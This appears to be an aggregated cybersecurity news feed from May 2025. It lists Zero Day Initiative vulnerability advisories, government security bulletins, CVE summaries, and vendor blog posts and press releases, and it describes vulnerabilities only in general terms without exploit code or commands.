A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Nguyen Hoang Thach of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27174: Microsoft
2025-05-21T05:00:00Z | 1747803600

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'goodbyeselene' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27167: Microsoft
2025-05-21T05:00:00Z | 1747803600

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Marcin Wiazowski' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26780: Amazon
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.0 AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Xavier DANEST' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27246: Microsoft
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.0 AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Simon Zuckerbraun - Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26849: Tenable
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Xavier DANEST' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26837: AzeoTech
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26840: AzeoTech
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26850: Array Networks
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26835: AzeoTech
2025-05-21T05:00:00Z | 1747803600

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-21, 16 days ago. The vendor is given until 2025-09-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-291: (Pwn2Own) Mozilla Firefox IonMonkey JIT Compiler Integer Overflow Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-4919.

http://www.zerodayinitiative.com/advisories/ZDI-25-291/
ZDI-25-292: (Pwn2Own) Mozilla Firefox SpiderMonkey Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-4919.

http://www.zerodayinitiative.com/advisories/ZDI-25-292/
ZDI-25-293: Microsoft Windows Installer Service Link Following Information Disclosure Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.1. The following CVEs are assigned: CVE-2025-29837.

http://www.zerodayinitiative.com/advisories/ZDI-25-293/
ZDI-25-294: Microsoft PC Manager MSPCManagerService Link Following Local Privilege Escalation Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft PC Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-29975.

http://www.zerodayinitiative.com/advisories/ZDI-25-294/
ZDI-25-295: Trend Micro Apex Central widget getObjWGFServiceApiByApiName Local File Inclusion Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trend Micro Apex Central. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-47865.

http://www.zerodayinitiative.com/advisories/ZDI-25-295/
ZDI-25-296: Trend Micro Apex Central modTMCM Unrestricted File Upload Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to upload arbitrary files on affected installations of Trend Micro Apex Central. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-47866.

http://www.zerodayinitiative.com/advisories/ZDI-25-296/
ZDI-25-297: Trend Micro Apex Central widget getBlock Local File Inclusion Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trend Micro Apex Central. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-47867.

http://www.zerodayinitiative.com/advisories/ZDI-25-297/
ZDI-25-298: Apple macOS MP4 File Parsing Memory Corruption Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-31233.

http://www.zerodayinitiative.com/advisories/ZDI-25-298/
ZDI-25-299: Apple macOS acv2 Codec Converter Out-Of-Bounds Read Information Disclosure Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-31208.

http://www.zerodayinitiative.com/advisories/ZDI-25-299/
ZDI-25-300: Apple macOS PDF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. Interaction with the CoreGraphics framework is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-31209.

http://www.zerodayinitiative.com/advisories/ZDI-25-300/
ZDI-25-301: Apple Safari Scrollbar Animation Use-After-Free Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-31238.

http://www.zerodayinitiative.com/advisories/ZDI-25-301/
ZDI-25-302: Apple macOS CoreMedia Framework Memory Corruption Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-31239.

http://www.zerodayinitiative.com/advisories/ZDI-25-302/
ZDI-25-303: Apple Safari SandboxBroker ZIP File Processing Out-Of-Bounds Read Information Disclosure Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-24222.

http://www.zerodayinitiative.com/advisories/ZDI-25-303/
ZDI-25-304: Apple macOS JPEG Image Decoding Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-31251.

http://www.zerodayinitiative.com/advisories/ZDI-25-304/
ZDI-25-305: Apple XNU kernel vm_map Race Condition Local Privilege Escalation Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows local attackers to escalate privileges on affected installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-31219.

http://www.zerodayinitiative.com/advisories/ZDI-25-305/
ZDI-25-306: Docker Desktop Helper Service Link Following Local Privilege Escalation Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows local attackers to escalate privileges on affected installations of Docker Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-5652.

http://www.zerodayinitiative.com/advisories/ZDI-25-306/
ZDI-25-307: Linux Kernel OpenvSwitch Out-Of-Bounds Read Information Disclosure Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows local attackers to disclose sensitive information on affected installations of Linux Kernel. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.7.

http://www.zerodayinitiative.com/advisories/ZDI-25-307/
ZDI-25-308: Adobe Dreamweaver V8 Remote Code Execution Vulnerability
2025-05-21T05:00:00Z | 1747803600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Dreamweaver. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-30310.

http://www.zerodayinitiative.com/advisories/ZDI-25-308/
VMWare Products Multiple Vulnerabilities
2025-05-21T03:00:00Z | 1747796400

Multiple vulnerabilities were identified in VMware products. A remote attacker could exploit some of these vulnerabilities to trigger cross-site scripting, remote code execution and denial of service condition on the targeted system. Impact Cross-Site Scripting Denial of Service Remote Code Execution System / Technologies affected vCenter Server 8.0 vCenter Server 7.0 VMware ESXi 8.0 VMware ESXi 7.0  VMware Cloud Foundation (vCenter) 5.x VMware Cloud Foundation (vCenter) 4.5.x VMware Cloud Foundation (ESXi) 5.x VMware Cloud Foundation (ESXi) 4.5.x VMware Telco Cloud Platform (ESXi) 5.x, 4.x, 3.x, 2.x VMware Telco Cloud Infrastructure (ESXi) 3.x VMware Telco Cloud Infrastructure (ESXi) 2.x VMware Telco Cloud Platform (vCenter) 5.x, 4.x, 3.x, 2.x VMware Telco Cloud Infrastructure (vCenter) 3.x VMware Telco Cloud Infrastructure (vCenter) 2.x VMware Workstation 17.x VMware Fusion 13.x Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25717

https://www.hkcert.org/security-bulletin/vmware-products-multiple-vulnerabilities_20250521
What is ICAP?
2025-05-21T01:00:00Z | 1747789200

Introduction to Internet Content Adaptation Protocol

https://www.opswat.com/blog/what-is-icap
Preventing Malware Intrusion and Protecting Sensitive Salesforce Data with OPSWAT’s MetaDefender for Salesforce
2025-05-21T00:30:00Z | 1747787400

Salesforce is where your teams move quickly - sharing files, collaborating across departments, and storing sensitive customer data.

https://www.opswat.com/blog/preventing-malware-intrusion-and-protecting-sensitive-salesforce-data-with-opswats-metadefender-for-salesforce
Calls C-DAYS 2025: presentations, workshops e posters
2025-05-21T00:00:00Z | 1747785600

Mantendo o compromisso com a inovação e o desenvolvimento, a 11.ª edição da conferência de cibersegurança C-DAYS alarga o âmbito da habitual Call for presentations, também a workshops e posters. Se tem uma visão inovadora, um caso de estudo relevante, uma experiência impactante, ideias, projetos ou tecnologias emergentes para partilhar, enquadrados na temática da C-DAYS e passíveis de associar a um dos temas definidos:Temas Gestão do risco; Criptografia; Engenharia Social; OSINT; IA para a cibersegurança; A cibersegurança da IA; IOT; OT; Criptografia Pós-Quântica; Educação, Formação e Sensibilização para a Cibersegurança; Literacia Digital; Cibersegurança e Geopolítica/Ciberconflito; Tactics, Techniques and Procedures; Regulação e Cibersegurança; Threat Hunting; Cibercrime; Criptografia Pós-Quântica; Educação, Formação e Sensibilização para a Cibersegurança; Literacia Digital; Cibersegurança e Geopolítica/Ciberconflito; Tactics, Techniques and Procedures; Regulação e Cibersegurança; Threat Hunting; Cibercrime. As candidaturas vão ser avaliadas por um júri composto por especialistas do Centro Nacional de Cibersegurança, da comunidade de segurança 0xOPOSEC e da AP2SI - Associação Portuguesa para a Promoção da Segurança da Informação, que vão selecionar: 8 apresentações, a ter lugar nos dias 24 e 25 de junho de 2025. 2 workshops a realizar no dia 26 de junho de 2025. 10 posters que vão estar expostos durante a conferência. Mais informações no site da conferência.

https://dyn.cncs.gov.pt/pt/detalhe/art/135930/calls-c-days-2025-presentations-workshops-e-posters
Join OPSWAT at Government Cyber Security Showcase Victoria
2025-05-21T00:00:00Z | 1747785600

OPSWAT is headed back to Australia for the 2025 Government Cyber Security Showcase!

https://www.opswat.com/blog/join-opswat-at-government-cyber-security-showcase-victoria
What is Managed File Transfer (MFT)?
2025-05-20T23:30:00Z | 1747783800

Why Critical Infrastructure Needs a Security-First Solution

https://www.opswat.com/blog/managed-file-transfer-mft
KrebsOnSecurity Hit With Near-Record 6.3 Tbps DDoS
2025-05-20T21:30:30Z | 1747776630

KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test run for a massive new Internet of Things (IoT) botnet capable of launching crippling digital assaults that few web destinations can withstand. Read on for more about the botnet, the attack, and the apparent creator of this global menace.

https://krebsonsecurity.com/2025/05/krebsonsecurity-hit-with-near-record-6-3-tbps-ddos/
Senators question Noem about CISA cuts, but get few details
2025-05-20T20:36:21Z | 1747773381

Homeland Security Secretary Kristi Noem declined to provide specifics on what would be removed from the nation’s leading cybersecurity agency in light of the Trump administration’s proposed $491 million budget cut to the organization.

https://therecord.media/noem-cisa-cuts-senate-hearing
Attack Surface Reduction for Enterprises: A Guide
2025-05-20T20:05:53Z | 1747771553

Today’s enterprises have embraced digital evolution. Business deals are conducted in online spaces, contracts are signed with a keyboard, data is held in physical servers and the cloud, and client...

https://www.firemon.com/blog/attack-surface-reduction-strategies-for-enterprises/
Palo Alto Networks Reports Fiscal Third Quarter 2025 Financial Results
2025-05-20T20:05:00Z | 1747771500

Fiscal third quarter revenue grew 15% year over year to $2.3 billion . Next-Generation Security ARR grew 34% year over year to $5.1 billion . Remaining performance obligation grew 19% year over year to $13.5 billion . SANTA CLARA, Calif. , May 20, 2025 /PRNewswire/ -- Palo Alto Networks (NASDAQ:

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-reports-fiscal-third-quarter-2025-financial
VMware security advisory (AV25-286)
2025-05-20T19:50:42Z | 1747770642

https://cyber.gc.ca/en/alerts-advisories/vmware-security-advisory-av25-286
Mozilla security advisory (AV25-285)
2025-05-20T19:22:37Z | 1747768957

https://cyber.gc.ca/en/alerts-advisories/mozilla-security-advisory-av25-285
Atlassian security advisory (AV25-284)
2025-05-20T19:22:33Z | 1747768953

https://cyber.gc.ca/en/alerts-advisories/atlassian-security-advisory-av25-284
Windows 11’s most important new feature is post-quantum cryptography. Here’s why.
2025-05-20T18:48:54Z | 1747766934

For the first time, new quantum-safe algorithms can be invoked using standard Windows APIs.

https://arstechnica.com/security/2025/05/heres-how-windows-11-aims-to-make-the-world-safe-in-the-post-quantum-era/
The Benefits of AI for Network Security and Monitoring
2025-05-20T18:00:00Z | 1747764000

We’ve seen more and more organizations leveraging AI for network security and monitoring. The reason? Modern networks are intricate ecosystems of cloud platforms, IoT devices, remote endpoints, and real-time applications—making comprehensive visibility and control a complex, ongoing challenge. From managing thousands of connected devices to ensuring consistent performance and reliability, network monitoring now demands more than manual oversight or static rule sets. At the same time,... Read more » The post The Benefits of AI for Network Security and Monitoring appeared first on Plixer.

https://www.plixer.com/blog/ai-for-network-security-and-monitoring/
[Control systems] CISA ICS security advisories (AV25–283)
2025-05-20T17:36:16Z | 1747762576

https://cyber.gc.ca/en/alerts-advisories/control-systems-cisa-ics-security-advisories-av25-283
A familiar playbook with a twist: 3AM ransomware actors dropped virtual machine with vishing and Quick Assist
2025-05-20T17:30:53Z | 1747762253

Another adversary picks up the email bombing / vishing Storm-1811 playbook, doing thorough reconnaissance to target specific employees with fake help desk call—this time, over the phone.

https://news.sophos.com/en-us/2025/05/20/a-familiar-playbook-with-a-twist-3am-ransomware-actors-dropped-virtual-machine-with-vishing-and-quick-assist/
A familiar playbook with a twist: 3AM ransomware actors dropped virtual machine with vishing and Quick Assist
2025-05-20T17:30:53Z | 1747762253

Another adversary picks up the email bombing / vishing Storm-1811 playbook, doing thorough reconnaissance to target specific employees with fake help desk call—this time, over the phone.

https://news.sophos.com/en-us/2025/05/20/a-familiar-playbook-with-a-twist-3am-ransomware-actors-dropped-virtual-machine-with-vishing-and-quick-assist/
Betting Big on Fraud: The Rise of Deposit Attacks in Online Gambling
2025-05-20T17:14:54Z | 1747761294

In the world of online gambling, fraud has evolved from simple manual schemes to highly automated, sophisticated attacks targeting critical systems after users log in. One of the most dangerous emerging threats is the deposit attacks, in which fraudsters exploit vulnerabilities in the deposit and withdrawal process, draining account funds and crippling platforms. In this […] The post Betting Big on Fraud: The Rise of Deposit Attacks in Online Gambling appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/deposit-attacks-target-online-gambling/
Dell brings new cybersecurity features to PowerStore, Data Domain, and PowerScale product lines
2025-05-20T17:00:00Z | 1747760400

The company is leaning into the disaggregated infrastructure and AI-powered cybersecurity trends with these latest updates

https://www.itpro.com/security/dell-brings-new-cybersecurity-features-to-powerstore-data-domain-and-powerscale-product-lines
Dell security advisory (AV25-282)
2025-05-20T16:35:24Z | 1747758924

https://cyber.gc.ca/en/alerts-advisories/dell-security-advisory-av25-282
IBM security advisory (AV25-281)
2025-05-20T15:53:51Z | 1747756431

https://cyber.gc.ca/en/alerts-advisories/ibm-security-advisory-av25-281
The State of AI in Cybersecurity 2025: What’s Working, What’s Lagging, and Why It Matters Now More Than Ever
2025-05-20T15:38:49Z | 1747755529

This second annual study offers a deeper look at how organizations are using AI to detect and respond to attacks faster, where it’s making the biggest impact, and what’s holding adoption back.

https://mixmode.ai/blog/the-state-of-ai-in-cybersecurity-2025-whats-working-whats-lagging-and-why-it-matters-now-more-than-ever/
CVE-2025-41426
2025-05-20T15:27:00Z | 1747754820

CWE-121 STACK-BASED BUFFER OVERFLOW: Affected Vertiv products contain a stack based buffer overflow vulnerability. An attacker could exploit this vulnerability to gain code execution on the device. Vertiv recommends users take the following actions: Update Liebert RDU101 to v1.9.1.2_0000001 Update IS-UNITY to v8.4.3.1_00160

https://claroty.com/team82/disclosure-dashboard/cve-2025-41426
CVE-2025-46412
2025-05-20T15:26:00Z | 1747754760

CWE-288 AUTHENTICATION BYPASS USING AN ALTERNATE PATH OR CHANNEL: Affected Vertiv products do not properly protect webserver functions that could allow an attacker to bypass authentication. Vertiv recommends users take the following actions: Update Liebert RDU101 to v1.9.1.2_0000001 Update IS-UNITY to v8.4.3.1_00160

https://claroty.com/team82/disclosure-dashboard/cve-2025-46412
A Guide to Perimeter Defense in Modern Networks
2025-05-20T15:12:54Z | 1747753974

Discover essential strategies for effective perimeter security and defense to safeguard your assets. Read the article for practical insights and solutions. The post A Guide to Perimeter Defense in Modern Networks appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/network-security/perimeter-security-and-defense/
The EU Cyber Resilience Act (CRA) Exposed: What You Need to Know Now
2025-05-20T15:03:11Z | 1747753391

The EU Cyber Resilience Act (CRA) is set to transform the landscape of cybersecurity compliance for manufacturers, developers, and supply chain providers across Europe—and its impact will be felt far beyond the EU’s borders. While the EU CRA won’t be fully enforced until 2027, the time for organizations to prepare is now. In a recent […] The post The EU Cyber Resilience Act (CRA) Exposed: What You Need to Know Now appeared first on RunSafe Security.

https://runsafesecurity.com/blog/eu-cra-secure-by-design-sbom-compliance/
Chicago Sun-Times prints summer reading list full of fake books
2025-05-20T14:52:35Z | 1747752755

Reading list in advertorial supplement contains 66% made up books with real author names.

https://arstechnica.com/ai/2025/05/chicago-sun-times-prints-summer-reading-list-full-of-fake-books/
Closing the cloud security gap with runtime security
2025-05-20T14:30:00Z | 1747751400

Imagine your cloud environment as a commercial plane. Before flight, planes undergo strict maintenance schedules, tests, and preflight checks to... The post Closing the cloud security gap with runtime security appeared first on Sysdig.

https://sysdig.com/blog/closing-the-cloud-security-gap-with-runtime-security/
Closing the cloud security gap with runtime security
2025-05-20T14:30:00Z | 1747751400

Imagine your cloud environment as a commercial plane. Before flight, planes undergo strict maintenance schedules, tests, and preflight checks to... The post Closing the cloud security gap with runtime security appeared first on Sysdig.

https://sysdig.com/blog/closing-the-cloud-security-gap-with-runtime-security/
The AI Fix #51: Divorce by coffee grounds, and why AI robots need your brain
2025-05-20T14:01:24Z | 1747749684

In episode 51 of The AI Fix, a Greek man's marriage is destroyed after ChatGPT reads his coffee, a woman dumps her husband to marry an AI called Leo, and Graham wonders whether it's time to upload his brain into a lunchbox-packing robot. Meanwhile, a humanoid robot goes full Michael Crawford in a Chinese factory, the UK government launches an AI to read angry public consultations, and Mark dreams of a world where robots finally have common sense - and swear like sailors. Plus Graham uncovers how AI is wrecking relationships and inventing soulmates, and Mark explains why Google's Gemini-powered bots might be smarter, more dexterous, and more emotionally stable than most of your exes. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

https://grahamcluley.com/the-ai-fix-51/
From Compliance to Resilience – Key Lessons from the NIS-2 Congress 2025
2025-05-20T13:54:44Z | 1747749284

The post From Compliance to Resilience – Key Lessons from the NIS-2 Congress 2025 appeared first on Open Systems.

https://www.open-systems.com/blog/nis-2-congress-2025/
Red Hat security advisory (AV25-280)
2025-05-20T13:53:48Z | 1747749228

https://cyber.gc.ca/en/alerts-advisories/red-hat-security-advisory-av25-280
Ubuntu security advisory (AV25-279)
2025-05-20T13:40:16Z | 1747748416

https://cyber.gc.ca/en/alerts-advisories/ubuntu-security-advisory-av25-279
Portnox Shortlisted in the 2025 Cloud Security Awards
2025-05-20T13:00:55Z | 1747746055

AUSTIN, TX – May 20, 2025 – Portnox announced today that it has been shortlisted in the Security Solution in Risk Identification/Risk Management category of the 2025 Cloud Security Awards. Now in its third year and operated by The Cloud Awards, the Security Awards’ program received entries from across the globe, including the USA and… The post Portnox Shortlisted in the 2025 Cloud Security Awards appeared first on Portnox.

https://www.portnox.com/blog/press-releases/portnox-shortlisted-in-the-2025-cloud-security-awards/
Tenable Reveals 2025 Global Partner Award Winners
2025-05-20T13:00:00Z | 1747746000

Tenable®, the exposure management company, today announced the recipients of its Global Partner Awards during Tenable AssureWorld — the company’s fifth annual virtual partner conference. Those honored this year include IBM — Global System Integrator of the Year; Siemens Energy — Tenable OT Security Partner of the Year; Telefonica — MSSP Partner of the Year; and AWS — Global Technology Partner of the Year. Tenable also crowned its regional Partners of the Year which recognizes those partners who consistently surpass expectations in collaboration and contribution throughout the year. This year’s winners are: Asia Pacific and Japan - DXCEurope, the Middle East and Africa - Softcat (UKI)Latin America - Global Sec TecnologiaNorth America - CDWPublic Sector - SHI “As a partner-first company, Tenable is hyper-focused on investing in and supporting channel partners, promoting collective success,” said Jeff Brooks, senior vice president of global channels, Tenable. “Our Global Partner Awards recognize partners whose dedication and collaboration with Tenable deliver truly exceptional outcomes in helping customers eradicate priority cyber weaknesses and protect against attacks.” Tenable AssureWorld is an exclusive event that allows Tenable and its partners to come together to learn and share information. The conference provides insights from top executives on Tenable's vision, revenue strategy, customer-focused business strategy, product roadmap, and other key areas of cybersecurity. In addition to providing resellers, distributors, MSSPs,  and systems integrators with innovative exposure management solutions, the Tenable Assure Partner Program arms partners with sales and marketing assistance, training and certification opportunities, services-delivery certification and technical support to grow their business and deliver exceptional exposure management and risk mitigation. More information on the Tenable Assure Partner Program is available at: https://www.tenable.com/partners/channel-partner-program.     About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com.

https://www.tenable.com/press-releases/tenable-reveals-2025-global-partner-award-winners
SAP Reimagines How Enterprises Run With Business AI
2025-05-20T12:35:00Z | 1747744500

ORLANDO — Putting the power of business AI in every user’s hands will revolutionize the way work gets done.

https://news.sap.com/2025/05/sap-business-ai-reimagine-how-enterprises-run/
Innovation Guide: Delivering on the Promise of Business AI
2025-05-20T12:34:00Z | 1747744440

Innovations boost business productivity while partnerships bring out our customers’ best

https://www.sap.com/events/sapphire/innovation-guide.html#new_tab
Accenture and SAP Join Forces to Help Companies Enable Connected Intelligence Across the Enterprise to Drive Speed and Agility in the AI Era
2025-05-20T12:33:00Z | 1747744380

NEW YORK and ORLANDO — ADVANCE will help create more connected, intelligent and responsive enterprises.

https://news.sap.com/2025/05/advance-accenture-sap-enable-connected-intelligence/
SAP and AWS Introduce AI Co-Innovation Program to Create Generative AI Solutions That Help Customers Navigate Market Volatility and Supply Chain Complexity
2025-05-20T12:32:00Z | 1747744320

Many organizations recognize generative AI’s potential to transform their business, but do not know where to start.

https://news.sap.com/2025/05/sap-aws-introduce-ai-co-innovation-program/
SAP and Cohere Partner to Deliver Trusted, Scalable Generative AI for the Enterprise
2025-05-20T12:31:00Z | 1747744260

Enterprise adoption of AI requires trust, scale, and real-world applicability.

https://news.sap.com/2025/05/sap-cohere-partner-trusted-scalable-generative-enterprise-ai/
Simplifying Zero Trust: How Cisco Security Suites Drive Value
2025-05-20T12:00:03Z | 1747742403

Discover how Cisco Security Suites are helping organizations achieve zero trust while realizing significant cost savings, improved productivity, and a 110% ROI.

https://blogs.cisco.com/security/how-cisco-security-suites-drive-value/
Celebrating 40 Years of Innovation
2025-05-20T12:00:00Z | 1747742400

Explore the digital version of our iconic anniversary exhibit from Cisco Live EMEA. Journey through 40 years of innovation to see how the network has evolved and how Cisco is securely powering AI at scale. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/celebrating-40-years-of-innovation.html
A low-cost, high-tech solution to save crops
2025-05-20T12:00:00Z | 1747742400

This year’s Cisco Youth Leadership Award winner combined AI, solar power, and SMS texts to protect smallholder farms across Africa. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/a-low-cost-high-tech-solution-to-save-crops.html
Celebrating 40 Years of Innovation
2025-05-20T12:00:00Z | 1747742400

Explore the digital version of our iconic anniversary exhibit from Cisco Live EMEA. Journey through 40 years of innovation to see how the network has evolved and how Cisco is securely powering AI at scale. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/celebrating-40-years-of-innovation.html
A low-cost, high-tech solution to save crops
2025-05-20T12:00:00Z | 1747742400

This year’s Cisco Youth Leadership Award winner combined AI, solar power, and SMS texts to protect smallholder farms across Africa. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

